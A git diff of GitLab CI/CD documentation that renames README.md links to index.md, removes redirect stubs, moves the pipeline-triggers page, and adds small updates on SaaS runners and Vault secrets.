`.gitlab-ci.yml` script](../yaml/README.md#script). +to [your `.gitlab-ci.yml` script](../yaml/index.md#script). It can be used for jobs that operate exclusively on artifacts, like a deployment job. Git repository data may be present, but it's likely out of date. You should only @@ -293,7 +293,7 @@ rely on files brought into the local working copy from cache or artifacts. The `GIT_SUBMODULE_STRATEGY` variable is used to control if / how Git submodules are included when fetching the code before a build. You can set them -globally or per-job in the [`variables`](../yaml/README.md#variables) section. +globally or per-job in the [`variables`](../yaml/index.md#variables) section. There are three possible values: `none`, `normal`, and `recursive`: @@ -332,7 +332,7 @@ For this feature to work correctly, the submodules must be configured The `GIT_CHECKOUT` variable can be used when the `GIT_STRATEGY` is set to either `clone` or `fetch` to specify whether a `git checkout` should be run. If not specified, it defaults to true. You can set them globally or per-job in the -[`variables`](../yaml/README.md#variables) section. +[`variables`](../yaml/index.md#variables) section. If set to `false`, the runner: @@ -360,7 +360,7 @@ script: The `GIT_CLEAN_FLAGS` variable is used to control the default behavior of `git clean` after checking out the sources. You can set it globally or per-job in the -[`variables`](../yaml/README.md#variables) section. +[`variables`](../yaml/index.md#variables) section. `GIT_CLEAN_FLAGS` accepts all possible options of the [`git clean`](https://git-scm.com/docs/git-clean) command. @@ -386,7 +386,7 @@ script: > [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4142) in GitLab Runner 13.1. The `GIT_FETCH_EXTRA_FLAGS` variable is used to control the behavior of -`git fetch`. You can set it globally or per-job in the [`variables`](../yaml/README.md#variables) section. +`git fetch`. You can set it globally or per-job in the [`variables`](../yaml/index.md#variables) section. `GIT_FETCH_EXTRA_FLAGS` accepts all options of the [`git fetch`](https://git-scm.com/docs/git-fetch) command. However, `GIT_FETCH_EXTRA_FLAGS` flags are appended after the default flags that can't be modified. @@ -428,7 +428,7 @@ It can be helpful for repositories with a large number of commits or old, large passed to `git fetch` and `git clone`. In GitLab 12.0 and later, newly-created projects automatically have a -[default `git depth` value of `50`](../pipelines/settings.md#git-shallow-clone). +[default `git depth` value of `50`](../pipelines/settings.md#limit-the-number-of-changes-fetched-during-clone). If you use a depth of `1` and have a queue of jobs or retry jobs, jobs may fail. @@ -450,7 +450,7 @@ variables: GIT_DEPTH: "3" ``` -You can set it globally or per-job in the [`variables`](../yaml/README.md#variables) section. +You can set it globally or per-job in the [`variables`](../yaml/index.md#variables) section. ### Custom build directories @@ -559,7 +559,7 @@ variables: GET_SOURCES_ATTEMPTS: 3 ``` -You can set them globally or per-job in the [`variables`](../yaml/README.md#variables) section. +You can set them globally or per-job in the [`variables`](../yaml/index.md#variables) section. ## System calls not available on GitLab.com shared runners diff --git a/doc/ci/runners/img/protected_runners_check_box.png b/doc/ci/runners/img/protected_runners_check_box.png Binary files differdeleted file mode 100644 index 3c47ebdec29..00000000000 --- a/doc/ci/runners/img/protected_runners_check_box.png +++ /dev/null diff --git a/doc/ci/runners/img/protected_runners_check_box_v14_1.png b/doc/ci/runners/img/protected_runners_check_box_v14_1.png Binary files differnew file mode 100644 index 00000000000..d67085d83f9 --- /dev/null +++ b/doc/ci/runners/img/protected_runners_check_box_v14_1.png diff --git a/doc/ci/runners/img/shared_runner_ip_address.png b/doc/ci/runners/img/shared_runner_ip_address.png Binary files differdeleted file mode 100644 index 527b4f4043d..00000000000 --- a/doc/ci/runners/img/shared_runner_ip_address.png +++ /dev/null diff --git a/doc/ci/runners/img/shared_runner_ip_address_14_1.png b/doc/ci/runners/img/shared_runner_ip_address_14_1.png Binary files differnew file mode 100644 index 00000000000..d7eeeae7a3c --- /dev/null +++ b/doc/ci/runners/img/shared_runner_ip_address_14_1.png diff --git a/doc/ci/runners/index.md b/doc/ci/runners/index.md new file mode 100644 index 00000000000..da7289a0ebd --- /dev/null +++ b/doc/ci/runners/index.md @@ -0,0 +1,18 @@ +--- +stage: Verify +group: Runner +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +# GitLab SaaS runners + +If you are using self-managed GitLab or you want to use your own runners on GitLab.com, you can +[install and configure your own runners](https://docs.gitlab.com/runner/install/). + +If you are using GitLab SaaS (GitLab.com), your CI jobs automatically run on shared runners. No configuration is required. +Your jobs can run on [Linux](build_cloud/linux_build_cloud.md) or [Windows](build_cloud/windows_build_cloud.md). + +The number of minutes you can use on these shared runners depends on your +[quota](../../user/admin_area/settings/continuous_integration.md#shared-runners-pipeline-minutes-quota), +which depends on your [subscription plan](../../subscriptions/gitlab_com/index.md#ci-pipeline-minutes). diff --git a/doc/ci/secrets/index.md b/doc/ci/secrets/index.md index d140344b40d..7fbc3448d4e 100644 --- a/doc/ci/secrets/index.md +++ b/doc/ci/secrets/index.md @@ -8,13 +8,14 @@ type: concepts, howto # Using external secrets in CI > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/218746) in GitLab 13.4 and GitLab Runner 13.4. +> - `file` setting [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/250695) in GitLab 14.1 and GitLab Runner 14.1. Secrets represent sensitive information your CI job needs to complete work. This sensitive information can be items like API tokens, database credentials, or private keys. Secrets are sourced from your secrets provider. Unlike CI/CD variables, which are always presented to a job, secrets must be explicitly -required by a job. Read [GitLab CI/CD pipeline configuration reference](../yaml/README.md#secrets) +required by a job. Read [GitLab CI/CD pipeline configuration reference](../yaml/index.md#secrets) for more information about the syntax. GitLab has selected [Vault by HashiCorp](https://www.vaultproject.io) as the @@ -80,7 +81,7 @@ To configure your Vault server: 1. Configure roles on your Vault server, restricting roles to a project or namespace, as described in [Configure Vault server roles](#configure-vault-server-roles) on this page. -1. [Create the following CI/CD variables](../variables/README.md#custom-cicd-variables) +1. [Create the following CI/CD variables](../variables/index.md#custom-cicd-variables) to provide details about your Vault server: - `VAULT_SERVER_URL` - The URL of your Vault server, such as `https://vault.example.com:8200`. Required. @@ -114,10 +115,22 @@ In this example: After GitLab fetches the secret from Vault, the value is saved in a temporary file. The path to this file is stored in a CI/CD variable named `DATABASE_PASSWORD`, -similar to [variables of type `file`](../variables/README.md#cicd-variable-types). +similar to [variables of type `file`](../variables/index.md#cicd-variable-types). + +To overwrite the default behavior, set the `file` option explicitly: + +```yaml +secrets: + DATABASE_PASSWORD: + vault: production/db/password@ops + file: false +``` + +In this example, the secret value is put directly in the `DATABASE_PASSWORD` variable +instead of pointing to a file that holds it. For more information about the supported syntax, read the -[`.gitlab-ci.yml` reference](../yaml/README.md#secretsvault). +[`.gitlab-ci.yml` reference](../yaml/index.md#secretsvault). ## Configure Vault server roles diff --git a/doc/ci/services/README.md b/doc/ci/services/README.md deleted file mode 100644 index 577a80407d7..00000000000 --- a/doc/ci/services/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-01' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/services/gitlab.md b/doc/ci/services/gitlab.md index 8afe8c784f3..558f53a9535 100644 --- a/doc/ci/services/gitlab.md +++ b/doc/ci/services/gitlab.md @@ -11,7 +11,7 @@ Many applications need to access JSON APIs, so application tests might need acce to APIs too. The following example shows how to use GitLab as a microservice to give tests access to the GitLab API. -1. Configure a [runner](../runners/README.md) with the Docker or Kubernetes executor. +1. Configure a [runner](../runners/index.md) with the Docker or Kubernetes executor. 1. In your `.gitlab-ci.yml` add: ```yaml @@ -25,7 +25,7 @@ tests access to the GitLab API. ``` 1. To set values for the `GITLAB_HTTPS` and `GITLAB_ROOT_PASSWORD`, - [assign them to a variable in the user interface](../variables/README.md#add-a-cicd-variable-to-a-project). + [assign them to a variable in the user interface](../variables/index.md#add-a-cicd-variable-to-a-project). Then assign that variable to the corresponding variable in your `.gitlab-ci.yml` file. @@ -37,4 +37,4 @@ For more information about why `gitlab` is used for the `Host`, see You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/u/gitlab). The `gitlab` image can accept environment variables. For more details, -see the [Omnibus documentation](../../install/README.md). +see the [Omnibus documentation](../../install/index.md). diff --git a/doc/ci/services/index.md b/doc/ci/services/index.md index 8d603b17e2e..c7891998a37 100644 --- a/doc/ci/services/index.md +++ b/doc/ci/services/index.md @@ -188,9 +188,9 @@ To override the default behavior, you can ## Passing CI/CD variables to services -You can also pass custom CI/CD [variables](../variables/README.md) +You can also pass custom CI/CD [variables](../variables/index.md) to fine tune your Docker `images` and `services` directly in the `.gitlab-ci.yml` file. -For more information, read about [`.gitlab-ci.yml` defined variables](../variables/README.md#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). +For more information, read about [`.gitlab-ci.yml` defined variables](../variables/index.md#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). ```yaml # The following variables are automatically passed down to the Postgres container @@ -228,7 +228,7 @@ test: | Setting | Required | GitLab version | Description | |------------|----------|----------------| ----------- | -| `name` | yes, when used with any other option | 9.4 | Full name of the image to use. It should contain the Registry part if needed. | +| `name` | yes, when used with any other option | 9.4 | Full name of the image to use. If the full image name includes a registry hostname, use the `alias` option to define a shorter service access name. For more information, see [Accessing the services](#accessing-the-services). | | `entrypoint` | no | 9.4 |Command or script to execute as the container's entrypoint. It's translated to Docker's `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/engine/reference/builder/#entrypoint) directive, where each shell token is a separate string in the array. | | `command` | no | 9.4 |Command or script that should be used as the container's command. It's translated to arguments passed to Docker after the image's name. The syntax is similar to [`Dockerfile`'s `CMD`](https://docs.docker.com/engine/reference/builder/#cmd) directive, where each shell token is a separate string in the array. | | `alias` (1) | no | 9.4 |Additional alias that can be used to access the service from the job's container. Read [Accessing the services](#accessing-the-services) for more information. | diff --git a/doc/ci/services/mysql.md b/doc/ci/services/mysql.md index 1e0762ca010..c691a6ef33d 100644 --- a/doc/ci/services/mysql.md +++ b/doc/ci/services/mysql.md @@ -12,11 +12,11 @@ need it for your tests to run. ## Use MySQL with the Docker executor -If you want to use a MySQL container, you can use [GitLab Runner](../runners/README.md) with the Docker executor. +If you want to use a MySQL container, you can use [GitLab Runner](../runners/index.md) with the Docker executor. This example shows you how to set a username and password that GitLab uses to access the MySQL container. If you do not set a username and password, you must use `root`. -1. [Create CI/CD variables](../variables/README.md#custom-cicd-variables) for your +1. [Create CI/CD variables](../variables/index.md#custom-cicd-variables) for your MySQL database and password by going to **Settings > CI/CD**, expanding **Variables**, and clicking **Add Variable**. @@ -130,5 +130,5 @@ GitLab Runner with the Shell executor. ## Example project To view a MySQL example, create a fork of this [sample project](https://gitlab.com/gitlab-examples/mysql). -This project uses publicly-available [shared runners](../runners/README.md) on [GitLab.com](https://gitlab.com). +This project uses publicly-available [shared runners](../runners/index.md) on [GitLab.com](https://gitlab.com). Update the README.md file, commit your changes, and view the CI/CD pipeline to see it in action. diff --git a/doc/ci/services/postgres.md b/doc/ci/services/postgres.md index 8451d56a71c..8d14e4795d2 100644 --- a/doc/ci/services/postgres.md +++ b/doc/ci/services/postgres.md @@ -13,7 +13,7 @@ do this with the Docker and Shell executors of GitLab Runner. ## Use PostgreSQL with the Docker executor -If you're using [GitLab Runner](../runners/README.md) with the Docker executor, +If you're using [GitLab Runner](../runners/index.md) with the Docker executor, you basically have everything set up already. First, in your `.gitlab-ci.yml` add: @@ -31,7 +31,7 @@ variables: To set values for the `POSTGRES_DB`, `POSTGRES_USER`, `POSTGRES_PASSWORD` and `POSTGRES_HOST_AUTH_METHOD`, -[assign them to a CI/CD variable in the user interface](../variables/README.md#custom-cicd-variables), +[assign them to a CI/CD variable in the user interface](../variables/index.md#custom-cicd-variables), then assign that variable to the corresponding variable in your `.gitlab-ci.yml` file. @@ -121,7 +121,7 @@ Database: nice_marmot We have set up an [Example PostgreSQL Project](https://gitlab.com/gitlab-examples/postgres) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly -available [shared runners](../runners/README.md). +available [shared runners](../runners/index.md). Want to hack on it? Fork it, commit, and push your changes. Within a few moments the changes are picked by a public runner and the job begins. diff --git a/doc/ci/services/redis.md b/doc/ci/services/redis.md index 71d3ffb1c60..d8c7b805864 100644 --- a/doc/ci/services/redis.md +++ b/doc/ci/services/redis.md @@ -13,7 +13,7 @@ do this with the Docker and Shell executors of GitLab Runner. ## Use Redis with the Docker executor -If you are using [GitLab Runner](../runners/README.md) with the Docker executor +If you are using [GitLab Runner](../runners/index.md) with the Docker executor you basically have everything set up already. First, in your `.gitlab-ci.yml` add: @@ -67,7 +67,7 @@ Host: localhost We have set up an [Example Redis Project](https://gitlab.com/gitlab-examples/redis) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available -[shared runners](../runners/README.md). +[shared runners](../runners/index.md). Want to hack on it? Simply fork it, commit and push your changes. Within a few moments the changes are picked by a public runner and the job begins. diff --git a/doc/ci/ssh_keys/README.md b/doc/ci/ssh_keys/README.md deleted file mode 100644 index 577a80407d7..00000000000 --- a/doc/ci/ssh_keys/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-01' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/ssh_keys/index.md b/doc/ci/ssh_keys/index.md index 2222ed0aa43..6136f3be3f6 100644 --- a/doc/ci/ssh_keys/index.md +++ b/doc/ci/ssh_keys/index.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: tutorial --- -# Using SSH keys with GitLab CI/CD +# Using SSH keys with GitLab CI/CD **(FREE)** GitLab currently doesn't have built-in support for managing SSH keys in a build environment (where the GitLab Runner runs). @@ -28,7 +28,7 @@ with any type of [executor](https://docs.gitlab.com/runner/executors/) ## How it works 1. Create a new SSH key pair locally with [`ssh-keygen`](https://linux.die.net/man/1/ssh-keygen) -1. Add the private key as a [variable](../variables/README.md) to +1. Add the private key as a [variable](../variables/index.md) to your project 1. Run the [`ssh-agent`](https://linux.die.net/man/1/ssh-agent) during job to load the private key. @@ -38,8 +38,8 @@ with any type of [executor](https://docs.gitlab.com/runner/executors/) In the following example, the `ssh-add -` command does not display the value of `$SSH_PRIVATE_KEY` in the job log, though it could be exposed if you enable -[debug logging](../variables/README.md#debug-logging). You might also want to -check the [visibility of your pipelines](../pipelines/settings.md#visibility-of-pipelines). +[debug logging](../variables/index.md#debug-logging). You might also want to +check the [visibility of your pipelines](../pipelines/settings.md#change-which-users-can-view-your-pipelines). ## SSH keys when using the Docker executor @@ -48,11 +48,11 @@ contained) and you want to deploy your code in a private server, you need a way to access it. This is where an SSH key pair comes in handy. 1. You first need to create an SSH key pair. For more information, follow - the instructions to [generate an SSH key](../../ssh/README.md#generate-an-ssh-key-pair). + the instructions to [generate an SSH key](../../ssh/index.md#generate-an-ssh-key-pair). **Do not** add a passphrase to the SSH key, or the `before_script` will prompt for it. -1. Create a new [CI/CD variable](../variables/README.md). +1. Create a new [CI/CD variable](../variables/index.md). As **Key** enter the name `SSH_PRIVATE_KEY` and in the **Value** field paste the content of your _private_ key that you created earlier. @@ -94,7 +94,7 @@ to access it. This is where an SSH key pair comes in handy. # - git config --global user.name "User name" ``` - The [`before_script`](../yaml/README.md#before_script) can be set globally + The [`before_script`](../yaml/index.md#before_script) can be set globally or per-job. 1. Make sure the private server's [SSH host keys are verified](#verifying-the-ssh-host-keys). @@ -124,7 +124,7 @@ on, and use that key for all projects that are run on this machine. ``` 1. Generate the SSH key pair as described in the instructions to - [generate an SSH key](../../ssh/README.md#generate-an-ssh-key-pair). + [generate an SSH key](../../ssh/index.md#generate-an-ssh-key-pair). **Do not** add a passphrase to the SSH key, or the `before_script` will prompt for it. @@ -160,7 +160,7 @@ ssh-keyscan example.com ssh-keyscan 1.2.3.4 ``` -Create a new [CI/CD variable](../variables/README.md) with +Create a new [CI/CD variable](../variables/index.md) with `SSH_KNOWN_HOSTS` as "Key", and as a "Value" add the output of `ssh-keyscan`. If you need to connect to multiple servers, all the server host keys @@ -207,7 +207,7 @@ before_script: We have set up an [Example SSH Project](https://gitlab.com/gitlab-examples/ssh-private-key/) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available -[shared runners](../runners/README.md). +[shared runners](../runners/index.md). Want to hack on it? Simply fork it, commit and push your changes. Within a few moments the changes is picked by a public runner and the job starts. diff --git a/doc/ci/triggers/README.md b/doc/ci/triggers/README.md index b8d0df44598..5ab8653dc35 100644 --- a/doc/ci/triggers/README.md +++ b/doc/ci/triggers/README.md @@ -1,288 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: tutorial +redirect_to: 'index.md' --- -# Triggering pipelines through the API **(FREE)** +This document was moved to [another location](index.md). -Triggers can be used to force a pipeline rerun of a specific `ref` (branch or -tag) with an API call. - -## Authentication tokens - -The following methods of authentication are supported: - -- [Trigger token](#trigger-token) -- [CI job token](#ci-job-token) - -If using the `$CI_PIPELINE_SOURCE` [predefined CI/CD variable](../variables/predefined_variables.md) -to limit which jobs run in a pipeline, the value could be either `pipeline` or `trigger`, -depending on which trigger method is used. - -| `$CI_PIPELINE_SOURCE` value | Trigger method | -|-----------------------------|----------------| -| `pipeline` | Using the `trigger:` keyword in the CI/CD configuration file, or using the trigger API with `$CI_JOB_TOKEN`. | -| `trigger` | Using the trigger API using a generated trigger token | - -This also applies when using the `pipelines` or `triggers` keywords with the legacy [`only/except` basic syntax](../yaml/README.md#only--except). - -### Trigger token - -A unique trigger token can be obtained when [adding a new trigger](#adding-a-new-trigger). - -WARNING: -Passing plain text tokens in public projects is a security issue. Potential -attackers can impersonate the user that exposed their trigger token publicly in -their `.gitlab-ci.yml` file. Use [CI/CD variables](../variables/README.md) -to protect trigger tokens. - -### CI job token - -You can use the `CI_JOB_TOKEN` [CI/CD variable](../variables/README.md#predefined-cicd-variables) (used to authenticate -with the [GitLab Container Registry](../../user/packages/container_registry/index.md)) in the following cases. - -#### When used with multi-project pipelines - -> - Use of `CI_JOB_TOKEN` for multi-project pipelines was [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/2017) in [GitLab Premium](https://about.gitlab.com/pricing/) 9.3. -> - Use of `CI_JOB_TOKEN` for multi-project pipelines was [made available](https://gitlab.com/gitlab-org/gitlab/-/issues/31573) in all tiers in GitLab 12.4. - -This way of triggering can only be used when invoked inside `.gitlab-ci.yml`, -and it creates a dependent pipeline relation visible on the -[pipeline graph](../multi_project_pipelines.md). For example: - -```yaml -trigger_pipeline: - stage: deploy - script: - - curl --request POST --form "token=$CI_JOB_TOKEN" --form ref=main "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" - rules: - - if: $CI_COMMIT_TAG -``` - -Pipelines triggered that way also expose a special variable: -`CI_PIPELINE_SOURCE=pipeline`. - -Read more about the [pipelines trigger API](../../api/pipeline_triggers.md). - -#### When a pipeline depends on the artifacts of another pipeline **(PREMIUM)** - -> The use of `CI_JOB_TOKEN` in the artifacts download API was [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/2346) in [GitLab Premium](https://about.gitlab.com/pricing/) 9.5. - -With the introduction of dependencies between different projects, one of -them may need to access artifacts created by a previous one. This process -must be granted for authorized accesses, and it can be done using the -`CI_JOB_TOKEN` variable that identifies a specific job. For example: - -```yaml -build_submodule: - image: debian - stage: test - script: - - apt update && apt install -y unzip - - curl --location --output artifacts.zip "https://gitlab.example.com/api/v4/projects/1/jobs/artifacts/main/download?job=test&job_token=$CI_JOB_TOKEN" - - unzip artifacts.zip - rules: - - if: $CI_COMMIT_TAG -``` - -This allows you to use that for multi-project pipelines and download artifacts -from any project to which you have access as this follows the same principles -with the [permission model](../../user/permissions.md#job-permissions). - -Read more about the [jobs API](../../api/job_artifacts.md#download-the-artifacts-archive). - -## Adding a new trigger - -Go to your -**Settings > CI/CD** under **Triggers** to add a new trigger. The **Add trigger** button creates -a new token which you can then use to trigger a rerun of this -particular project's pipeline. - -Every new trigger you create, gets assigned a different token which you can -then use inside your scripts or `.gitlab-ci.yml`. You also have a nice -overview of the time the triggers were last used. - - - -## Revoking a trigger - -You can revoke a trigger any time by going at your project's -**Settings > CI/CD** under **Triggers** and hitting the **Revoke** button. -The action is irreversible. - -## Triggering a pipeline - -To trigger a job you need to send a `POST` request to the GitLab API endpoint: - -```plaintext -POST /projects/:id/trigger/pipeline -``` - -The required parameters are the [trigger's `token`](#authentication-tokens) -and the Git `ref` on which the trigger is performed. Valid refs are -branches or tags. The `:id` of a project can be found by -[querying the API](../../api/projects.md) or by visiting the **CI/CD** -settings page which provides self-explanatory examples. - -When a rerun of a pipeline is triggered, jobs are marked as triggered `by API` in -**CI/CD > Jobs**. - -You can see which trigger caused a job to run by visiting the single job page. -A part of the trigger's token is exposed in the UI as you can see from the image -below. - - - -By using cURL you can trigger a pipeline rerun with minimal effort, for example: - -```shell -curl --request POST \ - --form token=TOKEN \ - --form ref=main \ - "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" -``` - -In this case, the pipeline for the project with ID `9` runs on the `main` branch. - -Alternatively, you can pass the `token` and `ref` arguments in the query string: - -```shell -curl --request POST \ - "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline?token=TOKEN&ref=main" -``` - -You can also benefit by using triggers in your `.gitlab-ci.yml`. Let's say that -you have two projects, A and B, and you want to trigger a pipeline on the `main` -branch of project B whenever a tag on project A is created. This is the job you -need to add in project A's `.gitlab-ci.yml`: - -```yaml -trigger_pipeline: - stage: deploy - script: - - 'curl --request POST --form token=TOKEN --form ref=main "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline"' - rules: - - if: $CI_COMMIT_TAG -``` - -This means that whenever a new tag is pushed on project A, the job runs and the -`trigger_pipeline` job is executed, triggering the pipeline for project B. The -`stage: deploy` ensures that this job runs only after all jobs with -`stage: test` complete successfully. - -## Triggering a pipeline from a webhook - -To trigger a job from a webhook of another project you need to add the following -webhook URL for Push and Tag events (change the project ID, ref and token): - -```plaintext -https://gitlab.example.com/api/v4/projects/9/ref/main/trigger/pipeline?token=TOKEN -``` - -You should pass `ref` as part of the URL, to take precedence over `ref` from -the webhook body that designates the branch ref that fired the trigger in the -source repository. Be sure to URL-encode `ref` if it contains slashes. - -### Using webhook payload in the triggered pipeline - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/31197) in GitLab 13.9. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/321027) in GitLab 13.11. - -If you trigger a pipeline by using a webhook, you can access the webhook payload with -the `TRIGGER_PAYLOAD` [predefined CI/CD variable](../variables/predefined_variables.md). -The payload is exposed as a [file-type variable](../variables/README.md#cicd-variable-types), -so you can access the data with `cat $TRIGGER_PAYLOAD` or a similar command. - -## Making use of trigger variables - -You can pass any number of arbitrary variables in the trigger API call and they -are available in GitLab CI/CD so that they can be used in your `.gitlab-ci.yml` -file. The parameter is of the form: - -```plaintext -variables[key]=value -``` - -This information is also exposed in the UI. Please note that _values_ are only viewable by Owners and Maintainers. - - - -Using trigger variables can be proven useful for a variety of reasons: - -- Identifiable jobs. Since the variable is exposed in the UI you can know - why the pipeline was triggered if you pass a variable that explains the - purpose. -- Conditional job processing. You can have conditional jobs that run whenever - a certain variable is present. - -Consider the following `.gitlab-ci.yml` where we set three -[stages](../yaml/README.md#stages) and the `upload_package` job is run only -when all jobs from the test and build stages pass. When the `UPLOAD_TO_S3` -variable is non-zero, `make upload` is run. - -```yaml -stages: - - test - - build - - package - -run_tests: - stage: test - script: - - make test - -build_package: - stage: build - script: - - make build - -upload_package: - stage: package - script: - - if [ -n "${UPLOAD_TO_S3}" ]; then make upload; fi -``` - -You can then trigger a pipeline while you pass the `UPLOAD_TO_S3` variable -and the script of the `upload_package` job is run: - -```shell -curl --request POST \ - --form token=TOKEN \ - --form ref=main \ - --form "variables[UPLOAD_TO_S3]=true" \ - "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" -``` - -Trigger variables have the [highest priority](../variables/README.md#cicd-variable-precedence) -of all types of variables. - -## Using cron to trigger nightly pipelines - -Whether you craft a script or just run cURL directly, you can trigger jobs -in conjunction with cron. The example below triggers a job on the `main` branch -of project with ID `9` every night at `00:30`: - -```shell -30 0 * * * curl --request POST --form token=TOKEN --form ref=main "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" -``` - -This behavior can also be achieved through the GitLab UI with -[pipeline schedules](../pipelines/schedules.md). - -## Legacy triggers - -Old triggers, created before GitLab 9.0 are marked as legacy. - -Triggers with the legacy label do not have an associated user and only have -access to the current project. They are considered deprecated and might be -removed with one of the future versions of GitLab. - -## Troubleshooting - -### '404 not found' when triggering a pipeline - -A response of `{"message":"404 Not Found"}` when triggering a pipeline might be caused -by using a Personal Access Token instead of a trigger token. [Add a new trigger](#adding-a-new-trigger) -and use that token to authenticate when triggering a pipeline. +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/triggers/index.md b/doc/ci/triggers/index.md new file mode 100644 index 00000000000..383887bd389 --- /dev/null +++ b/doc/ci/triggers/index.md @@ -0,0 +1,288 @@ +--- +stage: Verify +group: Pipeline Execution +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: tutorial +--- + +# Triggering pipelines through the API **(FREE)** + +Triggers can be used to force a pipeline rerun of a specific `ref` (branch or +tag) with an API call. + +## Authentication tokens + +The following methods of authentication are supported: + +- [Trigger token](#trigger-token) +- [CI job token](#ci-job-token) + +If using the `$CI_PIPELINE_SOURCE` [predefined CI/CD variable](../variables/predefined_variables.md) +to limit which jobs run in a pipeline, the value could be either `pipeline` or `trigger`, +depending on which trigger method is used. + +| `$CI_PIPELINE_SOURCE` value | Trigger method | +|-----------------------------|----------------| +| `pipeline` | Using the `trigger:` keyword in the CI/CD configuration file, or using the trigger API with `$CI_JOB_TOKEN`. | +| `trigger` | Using the trigger API using a generated trigger token | + +This also applies when using the `pipelines` or `triggers` keywords with the legacy [`only/except` basic syntax](../yaml/index.md#only--except). + +### Trigger token + +A unique trigger token can be obtained when [adding a new trigger](#adding-a-new-trigger). + +WARNING: +Passing plain text tokens in public projects is a security issue. Potential +attackers can impersonate the user that exposed their trigger token publicly in +their `.gitlab-ci.yml` file. Use [CI/CD variables](../variables/index.md) +to protect trigger tokens. + +### CI job token + +You can use the `CI_JOB_TOKEN` [CI/CD variable](../variables/index.md#predefined-cicd-variables) (used to authenticate +with the [GitLab Container Registry](../../user/packages/container_registry/index.md)) in the following cases. + +#### When used with multi-project pipelines + +> - Use of `CI_JOB_TOKEN` for multi-project pipelines was [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/2017) in [GitLab Premium](https://about.gitlab.com/pricing/) 9.3. +> - Use of `CI_JOB_TOKEN` for multi-project pipelines was [made available](https://gitlab.com/gitlab-org/gitlab/-/issues/31573) in all tiers in GitLab 12.4. + +This way of triggering can only be used when invoked inside `.gitlab-ci.yml`, +and it creates a dependent pipeline relation visible on the +[pipeline graph](../pipelines/multi_project_pipelines.md). For example: + +```yaml +trigger_pipeline: + stage: deploy + script: + - curl --request POST --form "token=$CI_JOB_TOKEN" --form ref=main "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" + rules: + - if: $CI_COMMIT_TAG +``` + +Pipelines triggered that way also expose a special variable: +`CI_PIPELINE_SOURCE=pipeline`. + +Read more about the [pipelines trigger API](../../api/pipeline_triggers.md). + +#### When a pipeline depends on the artifacts of another pipeline **(PREMIUM)** + +> The use of `CI_JOB_TOKEN` in the artifacts download API was [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/2346) in [GitLab Premium](https://about.gitlab.com/pricing/) 9.5. + +With the introduction of dependencies between different projects, one of +them may need to access artifacts created by a previous one. This process +must be granted for authorized accesses, and it can be done using the +`CI_JOB_TOKEN` variable that identifies a specific job. For example: + +```yaml +build_submodule: + image: debian + stage: test + script: + - apt update && apt install -y unzip + - curl --location --output artifacts.zip "https://gitlab.example.com/api/v4/projects/1/jobs/artifacts/main/download?job=test&job_token=$CI_JOB_TOKEN" + - unzip artifacts.zip + rules: + - if: $CI_COMMIT_TAG +``` + +This allows you to use that for multi-project pipelines and download artifacts +from any project to which you have access as this follows the same principles +with the [permission model](../../user/permissions.md#job-permissions). + +Read more about the [jobs API](../../api/job_artifacts.md#download-the-artifacts-archive). + +## Adding a new trigger + +Go to your +**Settings > CI/CD** under **Triggers** to add a new trigger. The **Add trigger** button creates +a new token which you can then use to trigger a rerun of this +particular project's pipeline. + +Every new trigger you create, gets assigned a different token which you can +then use inside your scripts or `.gitlab-ci.yml`. You also have a nice +overview of the time the triggers were last used. + + + +## Revoking a trigger + +You can revoke a trigger any time by going at your project's +**Settings > CI/CD** under **Triggers** and hitting the **Revoke** button. +The action is irreversible. + +## Triggering a pipeline + +To trigger a pipeline you need to send a `POST` request to the GitLab API endpoint: + +```plaintext +POST /projects/:id/trigger/pipeline +``` + +The required parameters are the [trigger's `token`](#authentication-tokens) +and the Git `ref` on which the trigger is performed. Valid refs are +branches or tags. The `:id` of a project can be found by +[querying the API](../../api/projects.md) or by visiting the **CI/CD** +settings page which provides self-explanatory examples. + +When a rerun of a pipeline is triggered, jobs are labeled as `triggered` in +**CI/CD > Jobs**. + +You can see which trigger caused a job to run by visiting the single job page. +A part of the trigger's token is exposed in the UI as you can see from the image +below. + + 